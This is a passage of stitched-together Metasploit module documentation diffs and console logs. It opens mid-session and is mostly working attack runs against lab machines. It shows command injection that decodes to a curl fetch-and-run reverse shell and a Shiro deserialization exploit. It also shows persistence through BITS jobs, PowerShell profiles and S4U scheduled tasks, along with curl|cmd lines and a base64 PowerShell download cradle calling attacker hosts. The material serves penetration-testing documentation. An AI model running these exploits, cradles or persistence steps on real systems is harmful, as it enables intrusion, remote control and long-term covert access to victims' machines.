uid=33(www-data) gid=33(www-data) groups=33(www-data)
msfadmin@metasploitable:~$
msf exploit(multi/http/os_cmd_exec) > options
Module options (exploit/multi/http/os_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /shell.php?cmd=!INJECT! yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST tap0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME mANdNVqs no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/os_cmd_exec) > check
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
### Mutillidae
This is on Metasploitable 2 VM:
```console
msf > use exploits/multi/http/os_cmd_exec
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10
RHOSTS => 10.0.0.10
msf exploit(multi/http/os_cmd_exec) > set LHOST tap0
LHOST => tap0
msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php
URIPATH => /mutillidae/index.php?page=dns-lookup.php
msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > options
Module options (exploit/multi/http/os_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /mutillidae/index.php?page=dns-lookup.php yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST tap0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME SYonhqJf no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/os_cmd_exec) > check
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
@@ -7,8 +7,10 @@ unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
server as the value to the `rememberMe` cookie. This will result in code
execution in the context of the web server.
The YSoSerial `CommonsCollections2` payload is known to work and is the one
leveraged by this module.
The YSoSerial `CommonsCollections2` payload is known to work and is the
default gadget chain used by this module. The gadget chain is configurable
via the `JAVA_GADGET_CHAIN` option; the selected chain must be available on
the target's classpath.
Note that other versions of Apache Shiro may also be exploitable if the
encryption key used by Shiro to encrypt `rememberMe` cookies is known.
@@ -29,9 +31,13 @@ You can use <https://github.com/Medicean/VulApps/tree/master/s/shiro/1>.
3. `run`
## Options
### ENC_KEY
The encryption key the target Apache Shiro server is using to encrypt its `rememberMe` cookies.
### JAVA_GADGET_CHAIN
The Java deserialization gadget chain to use. The chain must be available on the target's classpath.
## Scenarios
### Tested on GNU/Linux x86_64 using Shiro-1.2.4
@@ -43,15 +49,16 @@ msf exploit(multi/http/shiro_rememberme_v124_deserialize) > show options
Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):
Name Current Setting Required Description
---- --------------- -------- -----------
ENC_KEY kPH+bIxk5D2deZiIxcaaaA== yes Shiro encryption key
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base directory path
VHOST no HTTP server virtual host
Name Current Setting Required Description
---- --------------- -------- -----------
ENC_KEY kPH+bIxk5D2deZiIxcaaaA== yes Shiro encryption key
JAVA_GADGET_CHAIN CommonsCollections2 yes The Java gadget chain to use for deserialization
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base directory path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
@@ -0,0 +1,165 @@
## Vulnerable Application
This module establishes persistence by exclusively through a BITS job that
downloads and executes a payload. Background Intelligent Transfer Service
(BITS) is a Windows service for transferring files in the background
using idle network bandwidth. BITS jobs are persistent and will resume
across reboots until completed or cancelled.
BITS does not include a timing mechanism for when jobs are run, so we control that
in how we respond to the HTTP requests from the BITS client. This avoids needing
to set up an external trigger to start the job like a scheduled task or similar.
Similarily, BITS jobs are somewhat clock agnostic, so while we can set some
time parameters, the aren't a guarantee of when the job will actually run.
Jobs that we've idled via HTTP server response will have a "CONNECTING" status.
BITS is fickle about the HTTP responses it expects, so we have to be precise in
how the server responds. For a HEAD request we need to send back a correct
Content-Length header matching the payload size, but with no body. For GET requests
we need to handle byte range requests properly (althought not always used),
sending back the appropriate
Content-Range headers. If we respond incorrectly BITS may error out or retry
in unexpected ways. However, we can trick BITS into not getting the payload until
we want by responding to the GET requests with no body (aka how we responded to
the HEAD requests) until our delay time has reached.
### Debugging
To list bits jobs: `bitsadmin /list`
To get more info on a bits job: `bitsadmin /info <guid> /verbose`
To cancel all bits job: `bitsadmin /reset`
## Verification Steps
1. Start msfconsole
2. Get a session on Windows
3. Do: `use exploit/windows/persistence/bits`
3. Do: `set session #`
4. Do: `set srvhost <ip>`
1. Do: `run`
2. You should get a shell eventually
## Options
### JOB_NAME
The name to use for the bits job provider. (Default: random)
### PAYLOAD_NAME
Name of payload file to write. Random string as default.
### DELAY
Delay in seconds before callback. Defaults to `3600`
### RETRY_DELAY
Delay in seconds between retries. Defaults to `600`
## Scenarios
Specific demo of using the module that might be useful in a real world scenario.
### Windows 10 1909 (10.0 Build 18363).
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49712) at 2026-01-01 19:33:30 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/bits
msf exploit(windows/persistence/bits) > set session 1
session => 1
msf exploit(windows/persistence/bits) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/bits) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf exploit(windows/persistence/bits) > set srvport 80
srvport => 80
msf exploit(windows/persistence/bits) > set delay 200
delay => 200
msf exploit(windows/persistence/bits) > set retry_delay 60
retry_delay => 60
msf exploit(windows/persistence/bits) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/bits) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Likely exploitable
[*] Using URL: http://1.1.1.1/VkVKYnWc
[+] Successfully created BITS job T9vesd8HA with ID Created job {E7E39BA4-D14E-4B8F-B0DF-06CCF233E28F}.
[*] Executing: bitsadmin /addfile "T9vesd8HA" "http://1.1.1.1:80/VkVKYnWc" "C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe"
Added http://1.1.1.1:80/VkVKYnWc -> C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe to job.
[*] Executing: bitsadmin /SetNotifyCmdLine "T9vesd8HA" "cmd.exe" "/c bitsadmin /complete \"T9vesd8HA\" && if exist \"C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe\" start /b \"\" \"C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe\"""
notification command line set to 'cmd.exe' '/c bitsadmin /complete "T9vesd8HA" && if exist "C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe" start /b "" "C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe"" '.
[*] Executing: bitsadmin /SetMinRetryDelay "T9vesd8HA" 60
Minimum retry delay set to 60.
[*] Executing: bitsadmin /setpriority "T9vesd8HA" high
Priority set to HIGH.
[*] Executing: bitsadmin /setnoprogresstimeout "T9vesd8HA" 10
No progress timeout set to 10.
[*] Executing: bitsadmin /resume "T9vesd8HA"
[*] HTTP Server: HEAD /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
[+] HTTP Server: HEAD request received, sending response
[*] HTTP Server: GET /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
[*] HTTP Server: Early BITS connection, waiting till 01/01/2026 19:51:26 (198s left), sending empty body back to force a retry
Job resumed.
[+] Persistence installed! Payload will be downloaded to C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe when the BITS job T9vesd8HA runs.
msf exploit(windows/persistence/bits) > [*] HTTP Server: GET /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
[*] HTTP Server: Sending full payload to BITS client
[*] HTTP Server: GET /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
[*] HTTP Server: Sending full payload to BITS client
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49744) at 2026-01-01 19:53:15 -0500
```
@@ -0,0 +1,129 @@
## Vulnerable Application
This module establishes persistence by modifying a PowerShell profile script, which is automatically
executed when PowerShell starts. The module supports multiple profile scopes (current user or all users)
and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
## Verification Steps
1. Start msfconsole
2. Get a shell on Windows
3. Do: `use exploit/windows/persistence/powershell_profile`
4. Do: `set payload [payload]`
5. Do: `set session #`
6. Do: `run`
7. You should get a shell when powershell is opened on the target machine.
## Options
### PROFILE
The powershell profile to target. Choices are `AUTO`, `ALLUSERSALLHOSTS`, `ALLUSERSCURRENTHOST`, `CURRENTUSERALLHOSTS`, `CURRENTUSERCURRENTHOST`.
Defaults to `AUTO`
### CREATE
If a profile file doesnt exist, create one. Defaults to `false`
### EXECUTIONPOLICY
Attempt to update execution policy to execute. Defaults to `true`
## Scenarios
### Windows 10 1909 (10.0 Build 18363)
Initial shell
```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/NB_U4Lr2Ty2xrjYqvzRVEg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55201) at 2026-02-04 17:06:23 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/powershell_profile
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/powershell_profile) > set create true
create => true
msf exploit(windows/persistence/powershell_profile) > set EXECUTIONPOLICY true
EXECUTIONPOLICY => true
msf exploit(windows/persistence/powershell_profile) > set session 1
session => 1
msf exploit(windows/persistence/powershell_profile) > rexploit
[*] Reloading module...
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/powershell_profile) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Powershell execution policy for CurrentUser (Undefined), will attempt to override
[*] Updating Powershell execution policy for CurrentUser to RemoteSigned
[*] C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
[*] C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
[*] C:\Users\windows\Documents\WindowsPowerShell\profile.ps1 does not exist, creating it...
[*] Powershell command length: 4193
[*] Appending payload to C:\Users\windows\Documents\WindowsPowerShell\profile.ps1
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260204.1237/WIN10PROLICENSE_20260204.1237.rc
```
Start powershell on the target computer
```
[*] Sending stage (190534 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55207) at 2026-02-04 17:13:02 -0500
```
@@ -0,0 +1,183 @@
## Vulnerable Application
Creates a scheduled task that will run using service-for-user (S4U).
This allows the scheduled task to run even as an unprivileged user
that is not logged into the device. This will result in lower security
context, allowing access to local resources only. The module
requires 'Logon as a batch job' permissions (SeBatchLogonRight).
This variant uses an event trigger to launch the payload when a
specified event is logged to the Windows Event Log.
### Event Trigger Ideas
#### Service Start
Services like Windows Update, Google Update etc will trigger this (likely multiple times)
```
set EVENT_ID 7036
set EVENT_LOG System
```
#### Terminal Service Connection
In the System log, Event ID 56 usually comes from the TerminalServices-RemoteConnectionManager or TermDD source.
```
set EVENT_ID 5156
set EVENT_LOG System
set XPATH *[EventData[Data = \'INSERT IP ADDRESS\']]
```
Trigger the event with `nmap -sV -p 3389 x.x.x.x`
#### Failed Login (admin permissions required)
```
set EVENT_ID 4625
set EVENT_LOG Security
```
Trigger the event with `smbclient` or `auxiliary/scanner/smb/smb_login`
### Event Log Start
Should take place after a reboot
```
set EVENT_ID 6005
set EVENT_LOG System
```
## Verification Steps
1. Start msfconsole
2. Get a user level shell
3. Do: `use exploit/windows/persistence/service_for_user/event`
4. Do: `set event_id #`
5. Do: `set session #`
6. Do: `run`
7. Wait for the event to occur, or cause it to occur
8. You should eventually get a shell.
## Options
### EXPIRE_TIME
Number of minutes until trigger expires. Defaults to `0`
### PAYLOAD_NAME
Name of payload file to write. Random string as default.
### TASK_NAME
The name of task. Random string as default.
### EVENT_LOG
The event log to check for event. Defaults to `System`. Choices are: `Application`, `System`, `Security`, `Setup`, `ForwardedEvents`
### EVENT_ID
Event ID to trigger on.
### XPATH
XPath query
## Scenarios
### Windows 7 (6.1 Build 7601, Service Pack 1)
Initial shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.1:4449
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABwAGMATQBzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHAAYwBNAHMALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABwAGMATQBzAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBjAHcAaABtAE4AUAA0AEoAdAB5ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
msf exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Powershell command length: 3720
[*] 2.2.2.2 web_delivery - Delivering Payload (3720 bytes)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49554) at 2025-12-27 07:23:36 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WINDOWS7
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter > getuid
Server username: windows7\windows
meterpreter > background
[*] Backgrounding session 1...
```
Install persistence
```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/event
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/event) > set event_id 7036
event_id => 7036
msf exploit(windows/persistence/service_for_user/event) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/event) > set session 1
session => 1
msf exploit(windows/persistence/service_for_user/event) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service_for_user/event) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is likely exploitable
[*] Uploading C:\Users\windows\AppData\Local\Temp\lOsbcWHh.exe
[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\lOsbcWHh.exe
[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\LAxYVJnmQ.xml
[+] Persistence task McmPkAnp created successfully
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251227.2649/WINDOWS7_20251227.2649.rc
msf exploit(windows/persistence/service_for_user/event) >
```
Start any service, Google Chrome Update Service (gpupdate) causes ~2 shells, this was the Fax service.
```
